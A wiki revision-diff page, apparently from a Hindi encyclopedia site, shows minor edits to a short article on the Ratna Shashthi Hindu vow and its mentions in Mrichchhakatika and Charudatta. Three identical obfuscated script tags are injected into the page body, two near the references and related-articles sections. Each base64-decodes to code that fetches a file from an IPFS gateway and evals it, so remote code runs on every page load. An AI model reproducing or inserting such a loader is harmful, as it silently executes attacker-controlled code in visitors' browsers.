Difference between revisions of "रत्न षष्ठी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - "ref> (" to "ref>")
 
(6 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*रत्नषष्ठी व्रत मृच्छकटिका<ref> (मृच्छकटिका अंक 3)</ref> एवं चारुदत्त <ref>(चारुदत्त अंक 3, पृ0 63, भासलिखित)</ref> में उल्लिखित है।
+
*रत्नषष्ठी व्रत मृच्छकटिका<ref>मृच्छकटिका अंक 3</ref> एवं चारुदत्त <ref>चारुदत्त अंक 3, पृ0 63, भासलिखित</ref> में उल्लिखित है।
 
*वहाँ '''ननु षष्ठीम् उपवसामि''' नामक शब्द आये हैं, किन्तु यह कहना कठिन है कि यह रत्न [[षष्ठी]] है या कोई और।
 
*वहाँ '''ननु षष्ठीम् उपवसामि''' नामक शब्द आये हैं, किन्तु यह कहना कठिन है कि यह रत्न [[षष्ठी]] है या कोई और।
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 14:13, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ratnashashthi vrat mrichchhakatika[1] evan charudatt [2] mean ullikhit hai.
  • vahaan nanu shashthimh upavasami namak shabd aye haian, kintu yah kahana kathin hai ki yah ratn shashthi hai ya koee aur.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. mrichchhakatika aank 3
  2. charudatt aank 3, pri0 63, bhasalikhit

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>